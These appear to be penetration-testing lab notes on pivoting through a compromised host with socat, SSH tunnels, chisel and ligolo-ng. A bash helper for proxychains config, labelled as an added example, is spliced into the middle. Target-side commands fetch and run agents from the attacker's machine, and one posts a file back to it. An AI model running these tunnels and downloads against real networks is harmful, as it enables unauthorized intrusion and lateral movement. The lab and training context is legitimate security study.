Linux

IMPORTANT NOTE

NOTE: REMEMBER TO CHANGE THE PORT NUMBER IN /etc/proxychains4.conf (/etc/proxychains.conf ON OLDER INSTALLS) TO THE KALI SOCKS PORT YOU HAVE SET UP. (SAFEST IS TO KEEP ALL THE PORTS THE SAME TO AVOID CONFUSION, AND TO HAVE ONLY ONE ACTIVE ENTRY UNDER [ProxyList].)

Socat

On CONFLUENCE01

socat -ddd TCP-LISTEN:<CONFLUENCE01 Port>,fork TCP:<PGDATABASE01 IP Address>:<PGDATABASE01 Port>

On Kali

Any commands running on Kali to be pointed to CONFLUENCE01 IP Address

SSH

SSH Local Tunneling

On CONFLUENCE01

ssh -N -L 0.0.0.0:<CONFLUENCE01 Port>:<HRSHARES01 IP Address>:<HRSHARES01 Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>

On KALI

Any commands running on Kali to be pointed at CONFLUENCE01 IP Address

SSH Dynamic Tunneling

On CONFLUENCE01

ssh -N -D 0.0.0.0:<CONFLUENCE01 Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>

On Kali

Any commands running on Kali to be pointed at HRSHARES01 IP Address via Proxychains

SSH Remote Port Forwarding

On CONFLUENCE01

ssh -N -R 127.0.0.1:<Kali Port>:<PGDATABASE01 IP Address>:<PGDATABASE01 Port> kali@<Kali IP Address>

On Kali

Any commands running on Kali to be pointed at Loopback address

SSH Remote Dynamic Port Forwarding

On CONFLUENCE01

ssh -N -R <Kali Port> kali@<Kali IP Address>

On Kali

Any commands running on Kali to be pointed at PGDATABASE01 IP Address via Proxychains (the SOCKS proxy listens on Kali's loopback at <Kali Port>)

Chisel

On Kali

To start server

chisel server --port 8080 --reverse

To monitor network streams

sudo tcpdump -nvvvXi tun0 tcp port 8080

Any commands running on Kali to be pointed at PGDATABASE01 IP Address via Proxychains

On CONFLUENCE01

To install chisel on target machine

wget <Kali IP Address>/chisel -O /tmp/chisel && chmod +x /tmp/chisel

To port forward

/tmp/chisel client <Kali IP Address>:<Kali Port> R:socks > /dev/null 2>&1 &

To view the error output

/tmp/chisel client <Kali IP Address>:<Kali Port> R:socks &> /tmp/output; curl --data @/tmp/output http://<Kali IP Address>:<Kali Port>/
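The port mismatch warned about in the IMPORTANT NOTE at the top of the page bites every section that goes through proxychains (SSH dynamic tunneling, SSH remote dynamic port forwarding, and chisel R:socks above). The script below checks and sets the proxychains entry so the port always matches the SOCKS listener you just started. It is an added example, not part of the original notes or of the proxychains project: the function names are the example's own, the config path is passed in (Kali's is /etc/proxychains4.conf), the sample config is constructed to resemble Kali's default, and GNU sed is assumed for -i.

```bash
#!/usr/bin/env bash
# Added example: keep the proxychains [ProxyList] entry in step with the SOCKS
# port actually in use. Assumes GNU sed; function names are hypothetical.

# Constructed sample modelled on Kali's default config (not a copy of it); the
# stale Tor entry on 9050 is the one people forget to remove.
write_sample_conf() {
  cat > "$1" <<'EOF'
# constructed sample proxychains config
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
socks4 127.0.0.1 9050
EOF
}

# Number of active (uncommented) proxy entries under [ProxyList].
# With strict_chain, more than one means traffic is chained through all of them.
count_proxychains_proxies() {
  awk '/^\[ProxyList\]/ { inlist = 1; next }
       inlist && $1 ~ /^(socks4|socks5|http)$/ { n++ }
       END { print n + 0 }' "$1"
}

# Print "type host port" of the last active entry, or nothing if none.
get_proxychains_proxy() {
  awk '/^\[ProxyList\]/ { inlist = 1; next }
       inlist && $1 ~ /^(socks4|socks5|http)$/ { last = $1 " " $2 " " $3 }
       END { if (last != "") print last }' "$1"
}

# Replace every active entry with a single socks5 line for host:port.
# Deleting the old lines is deliberate: an appended line would not override
# a stale one, it would be chained behind it.
set_proxychains_proxy() {
  local conf=$1 host=$2 port=$3
  case $port in ''|*[!0-9]*) echo "bad port: $port" >&2; return 1 ;; esac
  sed -i -E '/^[[:space:]]*(socks4|socks5|http)[[:space:]]+/d' "$conf"
  grep -q '^\[ProxyList\]' "$conf" || printf '[ProxyList]\n' >> "$conf"
  printf 'socks5 %s %s\n' "$host" "$port" >> "$conf"
}

# Return 0 only when exactly one entry exists and it points at host:port.
# Run this before pointing tools at the pivot via proxychains.
check_proxychains_proxy() {
  local conf=$1 host=$2 port=$3
  [ "$(count_proxychains_proxies "$conf")" -eq 1 ] || return 1
  set -- $(get_proxychains_proxy "$conf")   # type host port
  [ "$2" = "$host" ] && [ "$3" = "$port" ]
}

# Usage (run as root against the real file once you trust it):
#   set_proxychains_proxy /etc/proxychains4.conf 127.0.0.1 1080
#   check_proxychains_proxy /etc/proxychains4.conf 127.0.0.1 1080 && proxychains nmap ...
```

For the SSH dynamic tunnel that listens on CONFLUENCE01 rather than on Kali, pass CONFLUENCE01's address as the host argument; for chisel R:socks and ssh -R the listener is on Kali's loopback, so 127.0.0.1 is correct.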

Ligolo-Ng

NOTE: When using nmap through the ligolo tun interface, add --unprivileged (forces a TCP connect scan instead of raw-socket SYN scanning) OR -PE (ICMP echo host discovery) to avoid false positives

Setup

On Kali

1
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <Internal net>/24 dev ligolo
2
mkdir ligolo && cd ligolo
3
mkdir proxy && cd proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
cd ..
4
mkdir agents && cd agents
mkdir windows && cd windows
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
cd ..
5
mkdir linux && cd linux
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
cd ..
6
python3 -m http.server 80

On Target Machine

Windows: certutil -urlcache -split -f http://<Kali IP Address>/windows/agent.exe
Linux: wget http://<Kali IP Address>/linux/agent -O /tmp/agent && chmod +x /tmp/agent

Tunnel

On Kali

./proxy -selfcert

NOTE: Run the above command from the ligolo/proxy directory created in Setup (the proxy listens on 0.0.0.0:11601 by default)

On Target Machine

agent.exe -connect <Kali IP Address>:<Kali Listening port> -ignore-cert (on Linux: /tmp/agent -connect <Kali IP Address>:<Kali Listening port> -ignore-cert)

NOTE: Once agent connects to server, return to Kali Machine and follow the steps in ligolo-ng console

session
<SELECT WHICH SESSION>
start

NOTE: Add the following (in the ligolo-ng console, inside the selected session) if you want hosts on the internal network to reach Kali, e.g. for a reverse shell. The agent listens on <Kali Port> and forwards to the same port on Kali.

listener_add --addr 0.0.0.0:<Kali Port> --to 127.0.0.1:<Kali Port>

Verify

listener_list
